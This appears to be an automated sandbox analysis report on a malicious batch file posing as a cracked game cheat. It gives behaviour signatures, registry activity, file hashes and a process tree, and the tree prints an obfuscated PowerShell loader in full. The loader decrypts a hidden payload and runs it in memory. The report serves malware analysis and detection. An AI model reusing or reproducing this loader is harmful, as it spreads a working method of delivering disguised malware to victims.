Analysis
max time kernel: 149s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 03/06/2024, 18:28
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://raw.githubusercontent.com/insomniastealer/vapev4-crack/main/VapeV4-cracked.bat
Resource: win10v2004-20240426-en
General
Target: https://raw.githubusercontent.com/insomniastealer/vapev4-crack/main/VapeV4-cracked.bat
Malware Config
Signatures
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | VapeV4-cracked.bat.exe
Executes dropped EXE (2 IoCs)
pid | Process
3368 | VapeV4-cracked.bat.exe
3524 | VapeV4-cracked.bat.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
flow | ioc
4 | raw.githubusercontent.com
8 | raw.githubusercontent.com
Drops file in Windows directory (2 IoCs)
description | ioc | Process
File created | C:\Windows\$sxr-seroxen2\$sxr-Uni.bat | cmd.exe
File opened for modification | C:\Windows\$sxr-seroxen2\$sxr-Uni.bat | cmd.exe
Enumerates system info in registry (2 TTPs, 3 IoCs)
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Modifies registry class (56 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | msedge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads" | msedge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | msedge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | msedge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" | msedge.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2" | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe1100000096c7af35d697da0165473838d697da0129c8fb38d697da0114000000 | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e8005398e082303024b98265d99428e115f0000 | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | msedge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg | msedge.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses (10 IoCs)
pid | Process
4148 | msedge.exe
4148 | msedge.exe
2704 | msedge.exe
2704 | msedge.exe
1048 | msedge.exe
1048 | msedge.exe
3368 | VapeV4-cracked.bat.exe
3368 | VapeV4-cracked.bat.exe
3524 | VapeV4-cracked.bat.exe
3524 | VapeV4-cracked.bat.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (3 IoCs)
pid | Process
2704 | msedge.exe
2704 | msedge.exe
2704 | msedge.exe
Suspicious use of AdjustPrivilegeToken (2 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 3368 | VapeV4-cracked.bat.exe
Token: SeDebugPrivilege | 3524 | VapeV4-cracked.bat.exe
Suspicious use of FindShellTrayWindow (31 IoCs)
pid | Process
2704 | msedge.exe (all 31 entries are identical)
Suspicious use of SendNotifyMessage (24 IoCs)
pid | Process
2704 | msedge.exe (all 24 entries are identical)
Suspicious use of SetWindowsHookEx (1 IoC)
pid | Process
1048 | msedge.exe
Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target
The 64 entries are repetitions of the following four, all with source PID 2704 (msedge.exe):
PID 2704 wrote to memory of 4208 | 2704 | msedge.exe | 81 (2 entries)
PID 2704 wrote to memory of 4160 | 2704 | msedge.exe | 82 (repeated many times)
PID 2704 wrote to memory of 4148 | 2704 | msedge.exe | 83 (2 entries)
PID 2704 wrote to memory of 3084 | 2704 | msedge.exe | 84 (repeated many times)
Processes
Level 1: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2704)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://raw.githubusercontent.com/insomniastealer/vapev4-crack/main/VapeV4-cracked.bat
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  Level 2: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4208)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9a06c46f8,0x7ff9a06c4708,0x7ff9a06c4718
  Level 2: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4160)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,14112293004265777115,3393408337875786106,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
  Level 2: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4148)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,14112293004265777115,3393408337875786106,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
    - Suspicious behavior: EnumeratesProcesses
  Level 2: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3084)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,14112293004265777115,3393408337875786106,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2624 /prefetch:8
  Level 2: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5172)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14112293004265777115,3393408337875786106,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
  Level 2: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1408)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14112293004265777115,3393408337875786106,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
  Level 2: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1048)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2088,14112293004265777115,3393408337875786106,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4928 /prefetch:8
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
  Level 2: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2836)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2088,14112293004265777115,3393408337875786106,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5160 /prefetch:8
  Level 2: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3004)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14112293004265777115,3393408337875786106,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:1
Level 1: C:\Windows\System32\CompPkgSrv.exe (PID 1688)
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
Level 1: C:\Windows\System32\CompPkgSrv.exe (PID 1872)
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
Level 1: C:\Windows\System32\NOTEPAD.EXE (PID 2648)
  Command line: "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\VapeV4-cracked.bat
Level 1: C:\Windows\System32\NOTEPAD.EXE (PID 5244)
  Command line: "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\VapeV4-cracked.bat
Level 1: C:\Windows\system32\cmd.exe (PID 2348)
  Command line: "C:\Windows\system32\cmd.exe"
  - Drops file in Windows directory
  Level 2: C:\Windows\system32\net.exe (PID 1128)
    Command line: net session
    Level 3: C:\Windows\system32\net1.exe (PID 4404)
      Command line: C:\Windows\system32\net1 session
  Level 2: C:\Users\Admin\Desktop\VapeV4-cracked.bat.exe (PID 3368)
    Command line: "VapeV4-cracked.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function DlXiw($jnfYj){ $QpJJS=[System.Security.Cryptography.Aes]::Create(); $QpJJS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QpJJS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QpJJS.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hq6nkjA2Agpp6rzE5ZH6qEdc87VQUGJSupueX0Nn2kI='); $QpJJS.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yCS6Miz0G0oYyOqVwRYRZw=='); $GHgia=$QpJJS.CreateDecryptor(); $return_var=$GHgia.TransformFinalBlock($jnfYj, 0, $jnfYj.Length); $GHgia.Dispose(); $QpJJS.Dispose(); $return_var;}function cuzkB($jnfYj){ $vMlyC=New-Object System.IO.MemoryStream(,$jnfYj); $jWECR=New-Object System.IO.MemoryStream; $xNVjy=New-Object System.IO.Compression.GZipStream($vMlyC, [IO.Compression.CompressionMode]::Decompress); $xNVjy.CopyTo($jWECR); $xNVjy.Dispose(); $vMlyC.Dispose(); $jWECR.Dispose(); $jWECR.ToArray();}function htDyt($jnfYj,$nQBBf){ $ryoCK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$jnfYj); $HgyeT=$ryoCK.EntryPoint; $HgyeT.Invoke($null, $nQBBf);}$zXORP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Desktop\VapeV4-cracked.bat').Split([Environment]::NewLine);foreach ($pJAbE in $zXORP) { if ($pJAbE.StartsWith('SEROXEN')) { $VXJBB=$pJAbE.Substring(7); break; }}$pogEs=[string[]]$VXJBB.Split('\');$WRGtE=cuzkB (DlXiw ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pogEs[0])));$HmueV=cuzkB (DlXiw ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pogEs[1])));htDyt $HmueV (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));htDyt $WRGtE (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Level 1: C:\Users\Admin\Desktop\VapeV4-cracked.bat.exe (PID 3524)
  Command line: "C:\Users\Admin\Desktop\VapeV4-cracked.bat.exe"
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 2KB
MD5: d85ba6ff808d9e5444a4b369f5bc2730
SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Filesize: 152B
MD5: ae54e9db2e89f2c54da8cc0bfcbd26bd
SHA1: a88af6c673609ecbc51a1a60dfbc8577830d2b5d
SHA256: 5009d3c953de63cfd14a7d911156c514e179ff07d2b94382d9caac6040cb72af
SHA512: e3b70e5eb7321b9deca6f6a17424a15b9fd5c4008bd3789bd01099fd13cb2f4a2f37fe4b920fb51c50517745b576c1f94df83efd1a7e75949551163985599998

Filesize: 152B
MD5: f53207a5ca2ef5c7e976cbb3cb26d870
SHA1: 49a8cc44f53da77bb3dfb36fc7676ed54675db43
SHA256: 19ab4e3c9da6d9cedda7461efdba9a2085e743513ab89f1dd0fd5a8f9486ad23
SHA512: be734c7e8afda19f445912aef0d78f9941add29baebd4a812bff27f10a1d78b52aeb11c551468c8644443c86e1a2a6b2e4aead3d7f81d39925e3c20406ac1499

Filesize: 193B
MD5: 62fc8758c85fb0d08cd24eeddafeda2c
SHA1: 320fc202790b0ca6f65ff67e9397440c7d97eb20
SHA256: ee0d15dce841e092ad1a2d4346a612410f8f950fdb019bc7b768f6346f2b5248
SHA512: ca97e615bdcac137a936c10104a702e1529ed3470828f2c3a2f783345ebbef04cac8c051df636c714151671efea53a9b8912b6b0d0b5eafdac5fae1dfdc8f85d

Filesize: 5KB
MD5: 6364122d95ba5c8a1a47498ee0b895dd
SHA1: 04276d73b278189c524e5b947bf137d8b37c3c92
SHA256: 96758a26f0ec7f5e90c73c943fb34c4a5e141ada1622b9c69c0afeb62f834141
SHA512: 744416cec6631ffba5d3ee7819a117b554b1755d48998f4703a39569153aa3228b9ca5f0566c105f3bea167504f6b58d99d43c41fcbfb054dbd3d6f37f2b173d

Filesize: 6KB
MD5: a80f219ddc63f23af27045bba9ef3268
SHA1: 6f29f065751f24fa9cb2ed902c81bd908f21ef9d
SHA256: 1ae332aa4e7354e1d7eb9f4ed5700007f97cc4f7b36af84701c05177e3336a22
SHA512: 5ae5070e4f498b2578f8c1bf331f82238e24b7fa0f12894fecd6343e4ee0ed351fbedbd8ef14d63b583fa2d9d6458f4467b43fa8028a6a79e4b487668a1f35e0

Filesize: 6KB
MD5: ca5ca9fecd88669407c486f3922d3ee6
SHA1: d3a081189b67f57b18df73831cb115cc04598746
SHA256: eb46a78511c4a05ffe355b4135c730f55bd10f4599778b54a14e87354897d505
SHA512: b8e8f208d283761819c094090dcd19039e17d5c1a7b4cad3b793d9efc1e7b99006bcc2188b335751e04cd760679d79e423fff747405252fcfb1a459c57b49ff4

Filesize: 204B
MD5: d305f08e5c05a342f90f2ebaea1b02c4
SHA1: d218574235f335658ac637a0fe281654fb43569c
SHA256: 2752f2b88a9f59a9bea1e2429c4e09245f5a35b91fbc9b9df79609ec7d7374b8
SHA512: 52484bccec63a9f4da92f9e90081b4b9d1ad050356d538822cab25cde651d65a022e291a6814fb4c06e3ea3449636420235e5c42f4d2570ced76f5386aeadedb

Filesize: 204B
MD5: c4c5bfcf50bad2b85bba276f5a87195b
SHA1: a626b76130908fa7e7187d2ce3a3ab86da8fbd10
SHA256: c60a951506b8c5967bc6117eb788f953757af91c94fa940a14a814157950ccba
SHA512: 6a8492d5b7fd90b67bc92ca733f303a4c6c74a77fcdc789389e5b718897357df617c6fce5085530cf5011269e037ee9bd298497e81e06aac962cd8a417d83f6b

Filesize: 10KB
MD5: 15461fdec285aea2305f333d6835bc7f
SHA1: 52e3697026e941f1058e06ec08a0e02820f82ae8
SHA256: 442d4d70e6776336cf0e9f6d8edde7495284385208a1ccdee5874538399527b5
SHA512: caae62a6f895288d2badbe9d40a517dc5c6b17b8110113065ec85b1ce92897ff5eb32d26ed904a77f59d03850cec18329065d140491d11345d06b5332780697a

Filesize: 10KB
MD5: a165acfd0c69f2b28d498d3b746e4b07
SHA1: 562dd0ba8e11eadf34d3eda190928e711854b58e
SHA256: acd11bb299822846a1bd760a66113e901dacd63bd343344947163ad2b3002ad4
SHA512: 57a80c826681ed926e591aee4627cdb84ea3ca87237cc038022b34dc91af6e93d4875e1377a01f763a43001c6f3dc55d95e790d348ad9fc16937834ec3926505

Filesize: 60B
